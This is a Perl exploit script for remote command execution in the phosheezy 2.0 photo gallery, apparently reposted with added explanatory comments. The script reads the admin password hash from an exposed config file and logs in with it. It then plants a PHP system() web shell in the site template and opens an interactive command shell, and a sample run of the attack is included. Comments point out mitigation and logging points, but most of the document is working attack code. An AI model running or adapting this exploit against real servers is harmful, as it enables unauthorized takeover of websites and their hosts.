phosheezy 2.0 Remote Command Execution Exploit
来源:osirys.org 作者:Osirys 发布时间:2009-01-15  
#!/usr/bin/perl

# phosheezy 2.0
# http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz
# Remote Command Execution Exploit
# by Osirys
# osirys[at]live[dot]it
# osirys.org
# Greets: HaVoC, x0r, jay, BlackLight
# lol at athos

# --------------------------------------------------------------
# Exploit in action :D
# --------------------------------------------------------------
# osirys[~]>$ perl exp.txt http://localhost/phosheezy/
#
#   ----------------------------
#      Phosheezy RCE Exploit
#         Coded by Osirys
#   ----------------------------
#
# [+] Admin password found:
#     Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c
# [+] Grabbing server headers to get a valid SESSION ID ..
# [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2
# [+] Succesfully logged in as Administrator
# [+] Template edited, RCE Vulnerability Created !
# shell$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell$> exit
# [-] Quitting ..
# osirys[~]>$
# --------------------------------------------------------------

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;

my $host       =  $ARGV[0];               # target base URL, "http://hostname/cms_path" (see help())
my $pwd_path   =  "/config/password";     # file fetched over plain HTTP below; the SHA-1 admin digest is read from it
my $adm_path   =  "/admin.php";           # login form, used by adm_log()
my $templ_path =  "/admin.php?action=3";  # layout-template editor, used by RCE_create()

help("-1") unless ($host);                # no argument: usage text and exit
cheek($host) == 1 || help("-2");          # rejected unless the argument contains "http://"
&banner;

# get_data() returns "host /path" as one string; split it back into the
# globals that adm_log() and RCE_create() read. get_data() already assigned
# the same two globals as a side effect, so this is effectively a reassignment.
$datas = get_data($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

# Step 1: GET <host>/config/password and look for a 40-hex SHA-1 digest.
# Everything that follows depends on this file being readable without
# authentication; denying web access to the config directory (or storing
# the digest outside the document root) stops the chain right here.
my $url = $host.$pwd_path;
my $re = get_req($url);

if ($re =~ /([0-9a-f]{40})/) {
    $password = $1;                       # global; also passed explicitly to adm_log()
    print "[+] Admin password found:\n";
    print "    Sha1 pwd: $password  \n";
    adm_log($password);                   # logs in, plants the template via RCE_create(), then enters exec_cmd()'s loop
}
else {
    print "[-] Unable to get sha1 Admin password\n\n";
    exit(0);
}

# Step 2 of the chain: log in to admin.php by POSTing the SHA-1 digest that
# was just read from /config/password as the `password` form field — the
# exploit relies on the application accepting the stored digest itself as
# the credential — then scan the raw HTTP response for the admin welcome
# text and a PHPSESSID cookie.
#   $_[0]   the 40-hex digest captured by the caller.
#   Reads globals $path, $h0st (set by get_data()) and $adm_path.
#   Writes globals $log_ (welcome text seen) and $phpsessid (session id).
#   On success calls RCE_create($phpsessid); on failure dies.
# Talks to port 80 over a plain IO::Socket::INET connection and parses the
# response by hand, so the Set-Cookie header is available verbatim.
sub adm_log() {
    my $password =  $_[0];
    my $link     =  $path.".".$adm_path;   # e.g. "/cms_path/./admin.php" — note the literal "/./" segment in the request path
    my $post     =  "password=$password&Login=Login";
    my $length   =  length($post);
    my @data;
    my $socket   =  new IO::Socket::INET(  # indirect-object form of IO::Socket::INET->new(...)
                                          PeerAddr => $h0st,
                                          PeerPort => '80',          # hard-coded; no TLS, no alternate port
                                          Proto    => 'tcp',
                                        ) or die $!;

    # Hand-built HTTP/1.1 POST. No "Connection: close" header is sent, so
    # how quickly the read loop below ends depends on the server closing
    # the connection.
    my $data = "POST ".$link." HTTP/1.1\r\n".
               "Host: ".$h0st."\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Content-Length: ".$length."\r\n\r\n".
               $post."\r\n";

    $socket->send($data);
    print "[+] Grabbing server headers to get a valid SESSION ID ..\n";

    # Slurp the whole response (headers and body) line by line until EOF.
    while (my $e = <$socket>) {
        push(@data,$e);
    }
    foreach my $e(@data) {
        if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) {
            $log_ = 1;                         # text the exploit treats as proof of an admin session
            print "[+] Succesfully logged in as Administrator\n";
        }
        elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) {
            $phpsessid = $1;                   # session id taken from the response headers
            print "[+] SESSION ID grabbed: $phpsessid\n";
        }
    }

    # Both markers are required. The socket is never closed explicitly; it
    # is released when the lexical goes out of scope.
    (($log_)&&($phpsessid)) || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!\n";
    RCE_create($phpsessid);
}

# Step 3: with the admin session, submit the "Edit Layout" form
# (admin.php?action=3). The footer field carries a PHP `system($_GET[cmd])`
# tag wrapped in `<!-- cmd -->` / `<!--cmd-->` HTML comments — a stored web
# shell inside the site template, which the application presumably writes
# to disk and renders on every page (exec_cmd() later reads it back through
# index.php). Success is detected by the "Edit layout again" text in the
# response.
#   $_[0]   PHPSESSID value obtained by adm_log().
#   Reads globals $path, $h0st, $templ_path; writes global $rce_c.
#   Calls exec_cmd() on success (which never returns); dies on failure.
# Detection/mitigation points visible from this code: a POST to
# admin.php?action=3 whose body contains "<?php", and a template file that
# contains a PHP open tag — the template editor should refuse or neutralise
# PHP tags before saving.
sub RCE_create() {
    my $phpsessid = $_[0];
    my $link     =  $path.".".$templ_path;   # e.g. "/cms_path/./admin.php?action=3"
    # Form body assembled from string pieces; `\$` stops Perl interpolating
    # so the PHP side receives a literal $_GET.
    my $code = "header=<html><head><title>Ryneezy PhoSheezy</tit".
               "le></head><body bgcolor=\"#ffffff\" text=\"#0000".
               "00\">&footer=</body></html><!-- cmd --><?php sys".
               "tem(\$_GET[cmd]);?><!--cmd-->&Submit=Edit Layout";
    my $length =  length($code);

    my $socket = new IO::Socket::INET(       # indirect-object form of IO::Socket::INET->new(...)
                                       PeerAddr => $h0st,
                                       PeerPort => '80',
                                       Proto    => 'tcp',
                                     ) or die $!;

    # Same hand-built POST as in adm_log(), plus the session cookie. The
    # role of the extra "hotlog=1" cookie is not evident from this script.
    my $data = "POST ".$link." HTTP/1.1\r\n".
               "Host: ".$h0st."\r\n".
               "Cookie: PHPSESSID=".$phpsessid."; hotlog=1\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Content-Length: ".$length."\r\n\r\n".
               "$code\r\n";

    $socket->send($data);

    # Read until the server closes the connection, watching for the
    # confirmation text.
    while (my $e = <$socket>) {
        if ($e =~ /Edit layout again/) {
            $rce_c = 1;
            print "[+] Template edited, RCE Vulnerability Created !\n";
        }
    }

    $rce_c == 1 || die "[-] Can't edit Template. Exploit failed\n\n";
    &exec_cmd;                               # `&name;` form: the current @_ (the session id) is passed along and ignored
}

# Step 4: interactive command loop. Reads a line from STDIN, sends it as
# the `cmd` query parameter of <host>/index.php, and prints whatever
# follows the `<!-- cmd -->` marker in the response — the output of the
# PHP system() call planted by RCE_create(). Implemented by recursion:
# both branches call exec_cmd() again, so the sub never returns and the
# stack grows by one frame per command. A line containing "exit" dies
# with "[-] Quitting ..".
# Uses globals $host, $cmd, $exec_url and $re. Each command travels in a
# GET query string, so it would typically appear in the web server's
# access log as an index.php?cmd=... request.
sub exec_cmd {
    print "shell\$> ";
    $cmd = <STDIN>;                                 # raw input line, stored in a global
    $cmd !~ /exit/ || die "[-] Quitting ..\n";      # "exit" anywhere in the line quits
    $exec_url = ($host."/index.php?cmd=".$cmd);     # the line is appended verbatim to the query string
    $re = get_req($exec_url);
    if ($re =~ /<!-- cmd -->(.*)/) {                # no /s: only the rest of that line is captured
        my $cmd = $1;                               # lexical; shadows the global $cmd above
        $cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/;   # closing marker right after the opening one means no output; show the error text instead
        print "$cmd\n";
        &exec_cmd;
    }
    else {
        print "[-] Undefined output or bad cmd !\n";
        &exec_cmd;
    }
}

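# GETs $link with a fresh LWP::UserAgent (4 s timeout) and returns the raw
# response body. On a connection error LWP returns a synthetic error
# response, so the string is then LWP's error text rather than page
# content; every caller only pattern-matches the body, so that degrades
# to a "not found" branch rather than a crash.
#   $_[0]   absolute URL to fetch.
# Changes from the original: $link is lexical (it used to be a package
# global that nothing else read) and the empty `()` prototype is gone —
# with the prototype in force, any call site compiled after the definition
# would be rejected with "Too many arguments".
sub get_req {
    my ($link) = @_;
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request( HTTP::Request->new( GET => $link ) );
    return $response->content;
}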

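# Returns 1 when $host is an http:// URL, otherwise 0. Only the scheme is
# validated here; host/path splitting is get_data()'s job. The match is
# anchored at the start of the string, so a stray "http://" later in the
# argument no longer counts as valid, and an undefined argument yields 0
# without a warning. The empty `()` prototype is dropped: it would make
# `cheek($host)` a compile error at any call site compiled after this
# definition.
#   $_[0]   candidate URL from the command line.
sub cheek {
    my ($host) = @_;
    return ( defined $host && $host =~ m{\Ahttp://}xms ) ? 1 : 0;
}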

# Splits an "http://host/path" argument into the bare host and the CMS
# path and returns them as one space-separated string ("host /path") that
# the caller re-splits with a regex. Also assigns the globals $h0st and
# $path as a side effect (the top-level code reassigns them from the
# return value). Host matching is `[a-z.]{1,30}`: only lowercase letters
# and dots are captured, and the path must follow on the same string; a
# "www." prefix is removed.
#   $_[0]   URL that already passed cheek().
sub get_data() {
    my $host = $_[0];
    $host =~ /http:\/\/(.*)/;
    $s_host = $1;                           # everything after the scheme (global; not read anywhere else)
    $s_host =~ /([a-z.]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);                # host part and the remainder of the URL
    $h0st !~ /www/ || $h0st =~ s/www\.//;   # strip the first "www." when present
    $path =~ s/(.*)/\/$1/;                  # prepend "/" so $path is an absolute path
    $full_det = $h0st." ".$path;            # global; the caller splits on the single space
    return $full_det;
}

# Prints the tool banner: a blank line, a framed three-line title, and a
# trailing blank line. Output only; takes no arguments and returns nothing
# useful.
sub banner {
    my @banner_lines = (
        '',
        '  ---------------------------- ',
        '     Phosheezy RCE Exploit     ',
        '        Coded by Osirys        ',
        '  ---------------------------- ',
        '',
    );
    print join("\n", @banner_lines), "\n";
    return;
}

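# Prints a diagnostic and the usage line, then exits 0. Never returns.
#   $_[0]   -1 when no argument was given, -2 when cheek() rejected it;
#           any other value prints only the usage line.
# Changes from the original: the empty `()` prototype is dropped (it
# would make `help("-1")` a compile error at call sites compiled after
# this definition), banner() is called with parentheses instead of the
# `&banner` form, the "Cheek" typo in the user-facing message is fixed,
# and an undefined argument no longer triggers a numeric-comparison
# warning.
sub help {
    my ($error) = @_;
    if ( defined $error && $error == -1 ) {
        banner();
        print "\n[-] Check that you provide a hostname address!\n";
    }
    elsif ( defined $error && $error == -2 ) {
        banner();
        print "\n[-] Bad hostname address !\n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
    exit(0);
}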


 